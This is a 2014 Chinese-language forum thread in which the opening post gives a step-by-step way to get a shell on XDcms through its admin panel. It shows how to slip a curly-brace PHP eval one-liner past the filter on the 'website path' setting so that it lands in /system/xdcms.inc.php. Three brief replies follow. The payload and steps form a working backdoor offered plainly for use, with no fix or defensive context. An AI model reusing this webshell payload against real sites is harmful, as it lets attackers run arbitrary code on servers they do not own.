90_ 发表于 2014-1-24 12:39:48

XDcms全版本后台getshell

xdcms后台网站配置基本信息的网站路径处过滤不严,仍可以插一句话拿shell。
前提 magic_quotes_gpc=Off

1.进后台,在基本信息中的网站路径处添加一句话,因为尖括号被转码,但是可以添加花括号型的一句话,${eval($_POST['rua'])}。

2.一句话写入在/system/xdcms.inc.php中。



作者:J_R

blck 发表于 2014-1-24 12:58:34

沙发,不知名、、、、

Mapleleaves 发表于 2014-1-24 14:51:53

这是什么cms?

黯然的彷徨 发表于 2014-1-26 12:40:16

感觉不明觉厉
页: [1]
查看完整版本: XDcms全版本后台getshell